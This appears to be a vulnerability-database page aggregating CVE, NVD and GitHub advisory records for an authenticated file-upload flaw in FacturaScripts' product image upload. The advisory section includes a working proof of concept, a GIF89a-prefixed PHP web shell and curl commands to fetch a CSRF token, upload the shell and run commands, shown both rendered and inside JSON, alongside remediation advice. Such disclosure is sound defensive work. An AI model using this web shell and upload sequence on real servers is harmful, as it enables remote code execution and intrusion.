CVE-2026-42879 (GCVE-0-2026-42879)

Vulnerability from cvelistv5 – Published: 2026-05-27 18:29 – Updated: 2026-05-27 18:29

Title

FacturaScripts: Authenticated Remote Code Execution (RCE) via GIF Image Upload in Product Images

Summary

FacturaScripts is an open source accounting and invoicing software. In 2025.81 and earlier, an authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php. The vulnerability exists the addImageAction() method of Core/Lib/ExtendedController/ProductImagesTrait.php.

Severity

6.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')
CWE-434 - Unrestricted Upload of File with Dangerous Type

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/NeoRazorX/facturascripts/secur…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
NeoRazorX	facturascripts	Affected: <= 2025.81

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "facturascripts",
          "vendor": "NeoRazorX",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 2025.81"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "FacturaScripts is an open source accounting and invoicing software. In 2025.81 and earlier, an authenticated unrestricted file upload vulnerability exists in FacturaScripts\u0027 product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php. The vulnerability exists the addImageAction() method of Core/Lib/ExtendedController/ProductImagesTrait.php."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-434",
              "description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-27T18:29:46.718Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-vf3q-frmr-vrr9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-vf3q-frmr-vrr9"
        }
      ],
      "source": {
        "advisory": "GHSA-vf3q-frmr-vrr9",
        "discovery": "UNKNOWN"
      },
      "title": "FacturaScripts: Authenticated Remote Code Execution (RCE) via GIF Image Upload in Product Images"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42879",
    "datePublished": "2026-05-27T18:29:46.718Z",
    "dateReserved": "2026-04-30T18:49:06.711Z",
    "dateUpdated": "2026-05-27T18:29:46.718Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-42879",
      "date": "2026-05-28",
      "epss": "0.00041",
      "percentile": "0.12775"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42879\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-27T19:16:18.173\",\"lastModified\":\"2026-05-27T19:49:48.143\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"FacturaScripts is an open source accounting and invoicing software. In 2025.81 and earlier, an authenticated unrestricted file upload vulnerability exists in FacturaScripts\u0027 product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php. The vulnerability exists the addImageAction() method of Core/Lib/ExtendedController/ProductImagesTrait.php.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":3.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"},{\"lang\":\"en\",\"value\":\"CWE-434\"}]}],\"references\":[{\"url\":\"https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-vf3q-frmr-vrr9\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-42879

Vulnerability from fkie_nvd - Published: 2026-05-27 19:16 - Updated: 2026-05-27 19:49

Severity

6.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-vf3q-frmr-vrr9

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "FacturaScripts is an open source accounting and invoicing software. In 2025.81 and earlier, an authenticated unrestricted file upload vulnerability exists in FacturaScripts\u0027 product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php. The vulnerability exists the addImageAction() method of Core/Lib/ExtendedController/ProductImagesTrait.php."
    }
  ],
  "id": "CVE-2026-42879",
  "lastModified": "2026-05-27T19:49:48.143",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-27T19:16:18.173",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-vf3q-frmr-vrr9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        },
        {
          "lang": "en",
          "value": "CWE-434"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-VF3Q-FRMR-VRR9

Vulnerability from github – Published: 2026-05-07 19:49 – Updated: 2026-05-07 19:49

Summary

FacturaScripts Vulnerable to Authenticated Remote Code Execution (RCE) via GIF Image Upload in Product Images

Details

CVE-2026-42879 - FacturaScripts - Authenticated Unrestricted File Upload via MIME Type Bypass

Summary

An authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php.

Details

The vulnerability exists in:

Core/Lib/ExtendedController/ProductImagesTrait.php

Specifically in the addImageAction() method.

Vulnerable Code

if (false === strpos($uploadFile->getMimeType(), 'image/')) {
    Tools::log()->error('file-not-supported');
    continue;
}

$folder = Tools::folder('MyFiles');
Tools::folderCheckOrCreate($folder);
$uploadFile->move($folder, $uploadFile->getClientOriginalName());

Root Cause

The validation only checks if MIME type contains "image/"
This can be bypassed by prepending GIF89a magic bytes to a PHP file
The system incorrectly identifies the file as image/gif
The file is saved with a .php extension in a web-accessible directory

File Storage Behavior

Uploaded files are stored in:

/MyFiles/YYYY/MM/X.php

Where X is an auto-incrementing ID. This allows direct remote execution:

http://target/MyFiles/2026/03/2.php?cmd=id

Impact

Successful exploitation:

An attacker may upload files with executable extensions (e.g. .php) to the server, which depending on server configuration could lead to further exploitation.

Proof of Concept (Manual)

Step 1: Create malicious file

cat > shell.jpg.php << 'EOF'
GIF89a
<?php
system($_GET['cmd']);
?>
EOF

Step 2: Authenticate

Login to the application
Extract PHPSESSID from browser cookies

Step 3: Get CSRF token

curl -s "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  | grep -o 'multireqtoken\" value=\"[^\"]*\"' | cut -d'"' -f4

Step 4: Upload shell

curl -X POST "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  -F "multireqtoken=YOUR_CSRF_TOKEN" \
  -F "action=add-image" \
  -F "activetab=EditProductoImagen" \
  -F "idproducto=3" \
  -F "newfiles[]=@shell.jpg.php"

Step 5: Execute command

curl "http://target/MyFiles/2026/03/2.php?cmd=id"

Affected Products

Field	Value
Ecosystem	Packagist
CVE ID	CVE-2026-42879
Package Name	`facturascripts/facturascripts`
Affected Versions	<= 2025.81
Patched Versions	Not yet patched
Fixed in	Pending

Remediation Recommendations

Validate file extension — reject any upload where the filename ends in .php, .phtml, .phar, or other executable extensions, regardless of MIME type
Re-generate filenames on the server — never use getClientOriginalName(); assign a safe UUID-based name with a validated extension
Store uploads outside the webroot — serve files through a controller that streams content, preventing direct URL execution
Use a file type library — validate actual file content (magic bytes + extension + MIME type) with a library like fileinfo rather than trusting client-supplied MIME

Credits

Discoverer: Abdullah Alwasabei / Guzrex

Severity

6.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "facturascripts/facturascripts"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2025.81"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42879"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-434",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T19:49:05Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "# CVE-2026-42879 - FacturaScripts - Authenticated Unrestricted File Upload via MIME Type Bypass\n \n## Summary\n \nAn authenticated unrestricted file upload vulnerability exists in FacturaScripts\u0027 product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php.\n \n---\n \n## Details\n \nThe vulnerability exists in:\n \n`Core/Lib/ExtendedController/ProductImagesTrait.php`\n \nSpecifically in the `addImageAction()` method.\n \n### Vulnerable Code\n \n```php\nif (false === strpos($uploadFile-\u003egetMimeType(), \u0027image/\u0027)) {\n    Tools::log()-\u003eerror(\u0027file-not-supported\u0027);\n    continue;\n}\n \n$folder = Tools::folder(\u0027MyFiles\u0027);\nTools::folderCheckOrCreate($folder);\n$uploadFile-\u003emove($folder, $uploadFile-\u003egetClientOriginalName());\n```\n \n### Root Cause\n \n- The validation only checks if MIME type contains `\"image/\"`\n- This can be bypassed by prepending **GIF89a magic bytes** to a PHP file\n- The system incorrectly identifies the file as `image/gif`\n- The file is saved with a `.php` extension in a web-accessible directory\n \n### File Storage Behavior\n \nUploaded files are stored in:\n \n```\n/MyFiles/YYYY/MM/X.php\n```\n \nWhere `X` is an auto-incrementing ID. This allows direct remote execution:\n \n```\nhttp://target/MyFiles/2026/03/2.php?cmd=id\n```\n \n---\n \n## Impact\n \nSuccessful exploitation:\n\nAn attacker may upload files with executable extensions (e.g. .php) to the server, which depending on server configuration could lead to further exploitation.\n---\n \n## Proof of Concept (Manual)\n \n### Step 1: Create malicious file\n \n```bash\ncat \u003e shell.jpg.php \u003c\u003c \u0027EOF\u0027\nGIF89a\n\u003c?php\nsystem($_GET[\u0027cmd\u0027]);\n?\u003e\nEOF\n```\n \n### Step 2: Authenticate\n \n- Login to the application\n- Extract `PHPSESSID` from browser cookies\n \n### Step 3: Get CSRF token\n \n```bash\ncurl -s \"http://target/EditProducto?code=CONTA621\" \\\n  -H \"Cookie: PHPSESSID=YOUR_SESSION_ID\" \\\n  | grep -o \u0027multireqtoken\\\" value=\\\"[^\\\"]*\\\"\u0027 | cut -d\u0027\"\u0027 -f4\n```\n \n### Step 4: Upload shell\n \n```bash\ncurl -X POST \"http://target/EditProducto?code=CONTA621\" \\\n  -H \"Cookie: PHPSESSID=YOUR_SESSION_ID\" \\\n  -F \"multireqtoken=YOUR_CSRF_TOKEN\" \\\n  -F \"action=add-image\" \\\n  -F \"activetab=EditProductoImagen\" \\\n  -F \"idproducto=3\" \\\n  -F \"newfiles[]=@shell.jpg.php\"\n```\n \n### Step 5: Execute command\n \n```bash\ncurl \"http://target/MyFiles/2026/03/2.php?cmd=id\"\n```\n \n---\n\n \n## Affected Products\n \n| Field | Value |\n|---|---|\n| Ecosystem | Packagist |\n| CVE ID | CVE-2026-42879 |\n| Package Name | `facturascripts/facturascripts` |\n| Affected Versions | \u003c= 2025.81 |\n| Patched Versions | Not yet patched |\n| Fixed in | Pending |\n \n---\n \n## Remediation Recommendations\n \n1. **Validate file extension** \u2014 reject any upload where the filename ends in `.php`, `.phtml`, `.phar`, or other executable extensions, regardless of MIME type\n2. **Re-generate filenames on the server** \u2014 never use `getClientOriginalName()`; assign a safe UUID-based name with a validated extension\n3. **Store uploads outside the webroot** \u2014 serve files through a controller that streams content, preventing direct URL execution\n4. **Use a file type library** \u2014 validate actual file content (magic bytes + extension + MIME type) with a library like `fileinfo` rather than trusting client-supplied MIME\n## Credits\n\n- **Discoverer**: Abdullah Alwasabei / Guzrex",
  "id": "GHSA-vf3q-frmr-vrr9",
  "modified": "2026-05-07T19:49:05Z",
  "published": "2026-05-07T19:49:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-vf3q-frmr-vrr9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NeoRazorX/facturascripts"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "FacturaScripts Vulnerable to Authenticated Remote Code Execution (RCE) via GIF Image Upload in Product Images"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42879 (GCVE-0-2026-42879)

FKIE_CVE-2026-42879

GHSA-VF3Q-FRMR-VRR9

CVE-2026-42879 - FacturaScripts - Authenticated Unrestricted File Upload via MIME Type Bypass

Summary

Details

Vulnerable Code

Root Cause

File Storage Behavior

Impact

An attacker may upload files with executable extensions (e.g. .php) to the server, which depending on server configuration could lead to further exploitation.

Proof of Concept (Manual)

Step 1: Create malicious file

Step 2: Authenticate

Step 3: Get CSRF token

Step 4: Upload shell

Step 5: Execute command

Affected Products

Remediation Recommendations

Credits

Tags

Sightings

Nomenclature